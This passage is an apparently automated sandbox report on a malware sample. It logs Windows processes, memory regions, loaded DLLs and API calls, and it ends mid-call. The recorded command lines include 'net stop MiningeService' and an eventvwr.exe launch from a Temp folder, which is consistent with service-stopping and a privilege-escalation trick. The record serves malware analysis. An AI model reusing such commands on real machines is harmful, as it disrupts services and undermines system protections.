monitor_reason = "child_process" parent_id = "19" os_parent_pid = "0xcdc" cmd_line = "net stop MiningeService" cur_dir = "C:\\Windows\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e771" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5485 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5486 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 5487 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 5488 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 5489 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 5490 start_va = 0x1d0000 end_va = 0x20ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 5491 start_va = 0x290000 end_va = 0x2a7fff monitored = 0 entry_point = 0x294905 region_type = mapped_file name = "net.exe" filename = "\\Windows\\SysWOW64\\net.exe" (normalized: "c:\\windows\\syswow64\\net.exe") Region: id = 5492 start_va = 0x330000 end_va = 0x3affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 5493 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5494 start_va = 0x779e0000 end_va = 0x77b5ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5495 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 5496 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 5497 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 5498 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 5499 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 5500 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5501 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5506 start_va = 0x4a0000 end_va = 0x51ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 5507 start_va = 0x75250000 end_va = 0x75257fff monitored = 0 entry_point = 0x752520f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5508 start_va = 0x75260000 end_va = 0x752bbfff monitored = 0 entry_point = 0x7529f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5509 start_va = 0x752c0000 end_va = 0x752fefff monitored = 0 entry_point = 0x752ee088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5510 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5511 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5512 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5513 start_va = 0x776e0000 end_va = 0x777fefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000776e0000" filename = "" Region: id = 5514 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 5515 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 5516 start_va = 0x520000 end_va = 0x70ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 5517 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5518 start_va = 0x76fe0000 end_va = 0x77026fff monitored = 0 entry_point = 0x76fe74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5519 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5520 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 5521 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 5522 start_va = 0x20000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 5523 start_va = 0x70000 end_va = 0xd6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5524 start_va = 0x76c20000 end_va = 0x76cbffff monitored = 0 entry_point = 0x76c349e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 5525 start_va = 0x76cc0000 end_va = 0x76d6bfff monitored = 0 entry_point = 0x76cca472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5526 start_va = 0x76900000 end_va = 0x76918fff monitored = 0 entry_point = 0x76904975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 5527 start_va = 0x75bc0000 end_va = 0x75caffff monitored = 0 entry_point = 0x75bd0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 5528 start_va = 0x75530000 end_va = 0x7558ffff monitored = 0 entry_point = 0x7554a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 5529 start_va = 0x75520000 end_va = 0x7552bfff monitored = 0 entry_point = 0x755210e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 5530 start_va = 0x753f0000 end_va = 0x753f8fff monitored = 0 entry_point = 0x753f15a6 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 5551 start_va = 0x753e0000 end_va = 0x753ecfff monitored = 0 entry_point = 0x753e12d0 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\SysWOW64\\browcli.dll" (normalized: "c:\\windows\\syswow64\\browcli.dll") Region: id = 5553 start_va = 0x753b0000 end_va = 0x753befff monitored = 0 entry_point = 0x753b125e region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\SysWOW64\\samcli.dll" (normalized: "c:\\windows\\syswow64\\samcli.dll") Region: id = 5554 start_va = 0x75390000 end_va = 0x753a8fff monitored = 0 entry_point = 0x75391319 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 5555 start_va = 0x75380000 end_va = 0x7538efff monitored = 0 entry_point = 0x753812a1 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 5556 start_va = 0x753c0000 end_va = 0x753d1fff monitored = 0 entry_point = 0x753c1200 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 5557 start_va = 0x74540000 end_va = 0x7455bfff monitored = 0 entry_point = 0x7454a431 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 5558 start_va = 0x76c10000 end_va = 0x76c15fff monitored = 0 entry_point = 0x76c11782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 5559 start_va = 0x74530000 end_va = 0x74536fff monitored = 0 entry_point = 0x7453128d region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 5560 start_va = 0x710000 end_va = 0x90ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Thread: id = 210 os_tid = 0x550 Process: id = "21" image_name = "eventvwr.exe" filename = "c:\\windows\\syswow64\\eventvwr.exe" page_root = "0x703d4000" os_pid = "0x8c8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "18" os_parent_pid = "0xc88" cmd_line = "\"C:\\Windows\\SysWOW64\\eventvwr.exe\" " cur_dir = "C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e771" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5534 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5535 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 5536 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 5537 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 5538 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 5539 start_va = 0x90000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 5540 start_va = 0x180000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 5541 start_va = 0x210000 end_va = 0x226fff monitored = 0 entry_point = 0x2125af region_type = mapped_file name = "eventvwr.exe" filename = "\\Windows\\SysWOW64\\eventvwr.exe" (normalized: "c:\\windows\\syswow64\\eventvwr.exe") Region: id = 5542 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5543 start_va = 0x779e0000 end_va = 0x77b5ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5544 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 5545 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 5546 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 5547 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 5548 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 5549 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5550 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Thread: id = 213 os_tid = 0x8cc Process: id = "22" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x64584000" os_pid = "0x8d0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "20" os_parent_pid = "0xd24" cmd_line = "C:\\Windows\\system32\\net1 stop MiningeService" cur_dir = "C:\\Windows\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e771" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5561 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5562 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 5563 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 5564 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 5565 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 5566 start_va = 0xf0000 end_va = 0x12ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 5567 start_va = 0x1e0000 end_va = 0x25ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 5568 start_va = 0x5b0000 end_va = 0x5d9fff monitored = 1 entry_point = 0x5b2188 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe") Region: id = 5569 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5570 start_va = 0x779e0000 end_va = 0x77b5ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5571 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 5572 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 5573 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 5574 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 5575 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 5576 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5577 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5603 start_va = 0x160000 end_va = 0x1dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 5604 start_va = 0x75250000 end_va = 0x75257fff monitored = 0 entry_point = 0x752520f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5605 start_va = 0x75260000 end_va = 0x752bbfff monitored = 0 entry_point = 0x7529f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5606 start_va = 0x752c0000 end_va = 0x752fefff monitored = 0 entry_point = 0x752ee088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5607 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5608 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5609 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5610 start_va = 0x776e0000 end_va = 0x777fefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000776e0000" filename = "" Region: id = 5611 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 5612 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 5613 start_va = 0x260000 end_va = 0x38ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 5614 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5615 start_va = 0x76fe0000 end_va = 0x77026fff monitored = 0 entry_point = 0x76fe74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5616 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5617 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 5618 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 5640 start_va = 0x20000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 5641 start_va = 0x70000 end_va = 0xd6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5642 start_va = 0x76c20000 end_va = 0x76cbffff monitored = 0 entry_point = 0x76c349e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 5643 start_va = 0x76cc0000 end_va = 0x76d6bfff monitored = 0 entry_point = 0x76cca472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5644 start_va = 0x76900000 end_va = 0x76918fff monitored = 0 entry_point = 0x76904975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 5645 start_va = 0x75bc0000 end_va = 0x75caffff monitored = 0 entry_point = 0x75bd0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 5646 start_va = 0x75530000 end_va = 0x7558ffff monitored = 0 entry_point = 0x7554a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 5647 start_va = 0x75520000 end_va = 0x7552bfff monitored = 0 entry_point = 0x755210e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 5648 start_va = 0x75370000 end_va = 0x75378fff monitored = 0 entry_point = 0x75371229 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\SysWOW64\\dsrole.dll" (normalized: "c:\\windows\\syswow64\\dsrole.dll") Region: id = 5662 start_va = 0x753f0000 end_va = 0x753f8fff monitored = 0 entry_point = 0x753f15a6 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 5663 start_va = 0x75340000 end_va = 0x75361fff monitored = 0 entry_point = 0x753453e9 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\SysWOW64\\logoncli.dll" (normalized: "c:\\windows\\syswow64\\logoncli.dll") Region: id = 5672 start_va = 0x753e0000 end_va = 0x753ecfff monitored = 0 entry_point = 0x753e12d0 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\SysWOW64\\browcli.dll" (normalized: "c:\\windows\\syswow64\\browcli.dll") Region: id = 5673 start_va = 0x753b0000 end_va = 0x753befff monitored = 0 entry_point = 0x753b125e region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\SysWOW64\\samcli.dll" (normalized: "c:\\windows\\syswow64\\samcli.dll") Region: id = 5674 start_va = 0x75390000 end_va = 0x753a8fff monitored = 0 entry_point = 0x75391319 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 5675 start_va = 0x75380000 end_va = 0x7538efff monitored = 0 entry_point = 0x753812a1 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 5676 start_va = 0x75320000 end_va = 0x75330fff monitored = 0 entry_point = 0x75321300 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 5695 start_va = 0x75300000 end_va = 0x75311fff monitored = 0 entry_point = 0x75304795 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\SysWOW64\\samlib.dll" (normalized: "c:\\windows\\syswow64\\samlib.dll") Region: id = 5700 start_va = 0x72c90000 end_va = 0x72ca7fff monitored = 0 entry_point = 0x72c91335 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\SysWOW64\\ntdsapi.dll" (normalized: "c:\\windows\\syswow64\\ntdsapi.dll") Region: id = 5701 start_va = 0x75610000 end_va = 0x75644fff monitored = 0 entry_point = 0x7561145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 5702 start_va = 0x76c10000 end_va = 0x76c15fff monitored = 0 entry_point = 0x76c11782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 5705 start_va = 0x130000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 5708 start_va = 0x72c80000 end_va = 0x72c81fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\SysWOW64\\netmsg.dll" (normalized: "c:\\windows\\syswow64\\netmsg.dll") Region: id = 5709 start_va = 0x260000 end_va = 0x28ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netmsg.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\netmsg.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\netmsg.dll.mui") Region: id = 5710 start_va = 0x290000 end_va = 0x38ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Thread: id = 214 os_tid = 0x8d4 [0269.764] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x25f98c | out: lpSystemTimeAsFileTime=0x25f98c*(dwLowDateTime=0xc7d6dac0, dwHighDateTime=0x1d7fb6e)) [0269.764] GetCurrentProcessId () returned 0x8d0 [0269.764] GetCurrentThreadId () returned 0x8d4 [0269.765] GetTickCount () returned 0x1d60948 [0269.765] QueryPerformanceCounter (in: lpPerformanceCount=0x25f984 | out: lpPerformanceCount=0x25f984*=3099596972730) returned 1 [0269.765] GetModuleHandleA (lpModuleName=0x0) returned 0x5b0000 [0269.765] __set_app_type (_Type=0x1) [0269.765] __p__fmode () returned 0x76d631f4 [0269.872] __p__commode () returned 0x76d631fc [0269.873] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x5bffe6) returned 0x0 [0269.873] __getmainargs (in: _Argc=0x5c9064, _Argv=0x5c906c, _Env=0x5c9068, _DoWildCard=0, _StartInfo=0x5c9024 | out: _Argc=0x5c9064, _Argv=0x5c906c, _Env=0x5c9068) returned 0 [0269.873] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0269.873] GetConsoleOutputCP () returned 0x1b5 [0269.873] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x5c9080 | out: lpCPInfo=0x5c9080) returned 1 [0269.873] SetThreadUILanguage (LangId=0x0) returned 0x409 [0269.925] sprintf_s (in: 